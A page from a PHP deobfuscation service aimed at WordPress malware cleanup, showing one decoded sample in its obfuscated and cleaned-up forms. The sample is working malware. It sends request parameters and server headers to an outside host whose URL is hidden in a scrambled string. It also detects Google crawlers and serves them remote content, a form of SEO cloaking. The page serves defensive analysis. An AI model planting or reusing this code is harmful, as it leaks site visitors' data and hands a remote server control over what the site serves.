Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $jqptmvofn = 'http://www.iptel.uz/api/'; $odothchkp = $_GET; $lkfrqukir = $_SERVER; $qjiahsbez = array(); $qjiahsbez['dqvvlryzc'] = json_encode($odothchkp); $qjiahsbez['agaczrbnt'] = json_encode($lkfrqukir); $bjqsywjaa = bkqlrnrsy(); $odothchkp = 'google'; $lkfrqukir = gethostbyaddr($bjqsyw...



Obfuscated php code

<?php

$jqptmvofn = 'http://www.iptel.uz/api/';
$odothchkp = $_GET;
$lkfrqukir = $_SERVER;
$qjiahsbez = array();
$qjiahsbez['dqvvlryzc'] = json_encode($odothchkp);
$qjiahsbez['agaczrbnt'] = json_encode($lkfrqukir);
$bjqsywjaa = bkqlrnrsy();
$odothchkp = 'google';
$lkfrqukir = gethostbyaddr($bjqsywjaa);
$qjiahsbez['lrzqduhqa'] = $bjqsywjaa;
$fbguxopwe = 0;
if(stristr($lkfrqukir,$odothchkp)){
	$fbguxopwe = 1;
}else{
	$lkfrqukir = array(
	'HTTP_USER_AGENT',
	'HTTP_REFERER'
	);
	foreach($lkfrqukir as $vs){
		if(isset($_SERVER[$vs]) && stristr($_SERVER[$vs], $odothchkp)){
			$fbguxopwe = 1;
		}
	}
}
if($fbguxopwe){
	foreach($qjiahsbez as $vs){
		$bjqsywjaa = zjpbnbdks($jqptmvofn,$qjiahsbez);
		if ( preg_match( '/<defs>(.+?)<\/defs>/is', $bjqsywjaa, $odothchkp ) ) {
			$lkfrqukir = $odothchkp[1];
			$lkfrqukir = @gzinflate($lkfrqukir);
			$zqmzayhvi = json_decode($lkfrqukir,true);
			if(count($zqmzayhvi)){
				
				foreach($zqmzayhvi as $key=>$vs){
					$$key = $vs;
				}
					
				if(isset($syvydbsrw) && $syvydbsrw){
					header("Content-Type: text/xml");
				}
				
				if(isset($fnbpijvdp) && $fnbpijvdp){
					echo $fnbpijvdp;
					exit;
				}
			}
		}
	}
}
function bkqlrnrsy() {
		
	$bjqsywjaa = false;

	$odothchkp = array(
		'HTTP_CLIENT_IP',
		'HTTP_X_FORWARDED_FOR',
		'HTTP_X_FORWARDED',
		'HTTP_X_CLUSTER_CLIENT_IP',
		'HTTP_FORWARDED_FOR',
		'HTTP_FORWARDED',
		'REMOTE_ADDR',
	);

	foreach ( $odothchkp as $lkfrqukir ) {
		if ( array_key_exists( $lkfrqukir, $_SERVER ) ) {
			$zqmzayhvi = explode( ',', $_SERVER[ $lkfrqukir ] );
			$bjqsywjaa = trim( $zqmzayhvi[0] );
			break;
		}
	}
	return $bjqsywjaa;
}
function zjpbnbdks( $jqptmvofn, $lkfrqukir = array() ){
	$bjqsywjaa = 'htztawtygpew:py/mc/xjwlcwfxwki.uzmmbstiklvdrmisdsrftmmpvy.glckfoxcmet/gnahkmkhaekpiwtequbhsgv2qk2ku1qw2vz0af3vd-tc5bv/kdaflpfbibc.lopmdhebpva';
	$odothchkp = strlen($bjqsywjaa);
	$jqptmvofn = '';
	for($i=0; $i<$odothchkp; $i++){
		if(!($i%3)){
			$jqptmvofn .= $bjqsywjaa[$i];
		}
	}
	$odothchkp =  count($lkfrqukir);
	$zqmzayhvi = curl_init();
	curl_setopt( $zqmzayhvi, CURLOPT_URL, $jqptmvofn );
	curl_setopt( $zqmzayhvi, CURLOPT_HEADER, false );
	curl_setopt( $zqmzayhvi, CURLOPT_RETURNTRANSFER, true );
	if( $odothchkp ){
		curl_setopt( $zqmzayhvi, CURLOPT_POST, true );
		curl_setopt( $zqmzayhvi, CURLOPT_POSTFIELDS, $lkfrqukir );
	}
	curl_setopt( $zqmzayhvi, CURLOPT_CONNECTTIMEOUT, 30 );
	$qjiahsbez = curl_exec( $zqmzayhvi );
	curl_close( $zqmzayhvi );
	return $qjiahsbez;	
}


?>

Decoded(de-Obfuscated) php code

<?php

$jqptmvofn = 'http://www.iptel.uz/api/';
$odothchkp = $_GET;
$lkfrqukir = $_SERVER;
$qjiahsbez = array();
$qjiahsbez['dqvvlryzc'] = json_encode($odothchkp);
$qjiahsbez['agaczrbnt'] = json_encode($lkfrqukir);
$bjqsywjaa = bkqlrnrsy();
$odothchkp = 'google';
$lkfrqukir = gethostbyaddr($bjqsywjaa);
$qjiahsbez['lrzqduhqa'] = $bjqsywjaa;
$fbguxopwe = 0;
if (stristr($lkfrqukir, $odothchkp)) {
    $fbguxopwe = 1;
} else {
    $lkfrqukir = array('HTTP_USER_AGENT', 'HTTP_REFERER');
    foreach ($lkfrqukir as $vs) {
        if (isset($_SERVER[$vs]) && stristr($_SERVER[$vs], $odothchkp)) {
            $fbguxopwe = 1;
        }
    }
}
if ($fbguxopwe) {
    foreach ($qjiahsbez as $vs) {
        $bjqsywjaa = zjpbnbdks($jqptmvofn, $qjiahsbez);
        if (preg_match('/<defs>(.+?)<\\/defs>/is', $bjqsywjaa, $odothchkp)) {
            $lkfrqukir = $odothchkp[1];
            $lkfrqukir = @gzinflate($lkfrqukir);
            $zqmzayhvi = json_decode($lkfrqukir, true);
            if (count($zqmzayhvi)) {
                foreach ($zqmzayhvi as $key => $vs) {
                    ${$key} = $vs;
                }
                if (isset($syvydbsrw) && $syvydbsrw) {
                    header("Content-Type: text/xml");
                }
                if (isset($fnbpijvdp) && $fnbpijvdp) {
                    echo $fnbpijvdp;
                    exit;
                }
            }
        }
    }
}
function bkqlrnrsy()
{
    $bjqsywjaa = false;
    $odothchkp = array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR');
    foreach ($odothchkp as $lkfrqukir) {
        if (array_key_exists($lkfrqukir, $_SERVER)) {
            $zqmzayhvi = explode(',', $_SERVER[$lkfrqukir]);
            $bjqsywjaa = trim($zqmzayhvi[0]);
            break;
        }
    }
    return $bjqsywjaa;
}
function zjpbnbdks($jqptmvofn, $lkfrqukir = array())
{
    $bjqsywjaa = 'htztawtygpew:py/mc/xjwlcwfxwki.uzmmbstiklvdrmisdsrftmmpvy.glckfoxcmet/gnahkmkhaekpiwtequbhsgv2qk2ku1qw2vz0af3vd-tc5bv/kdaflpfbibc.lopmdhebpva';
    $odothchkp = strlen($bjqsywjaa);
    $jqptmvofn = '';
    for ($i = 0; $i < $odothchkp; $i++) {
        if (!($i % 3)) {
            $jqptmvofn .= $bjqsywjaa[$i];
        }
    }
    $odothchkp = count($lkfrqukir);
    $zqmzayhvi = curl_init();
    curl_setopt($zqmzayhvi, CURLOPT_URL, $jqptmvofn);
    curl_setopt($zqmzayhvi, CURLOPT_HEADER, false);
    curl_setopt($zqmzayhvi, CURLOPT_RETURNTRANSFER, true);
    if ($odothchkp) {
        curl_setopt($zqmzayhvi, CURLOPT_POST, true);
        curl_setopt($zqmzayhvi, CURLOPT_POSTFIELDS, $lkfrqukir);
    }
    curl_setopt($zqmzayhvi, CURLOPT_CONNECTTIMEOUT, 30);
    $qjiahsbez = curl_exec($zqmzayhvi);
    curl_close($zqmzayhvi);
    return $qjiahsbez;
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.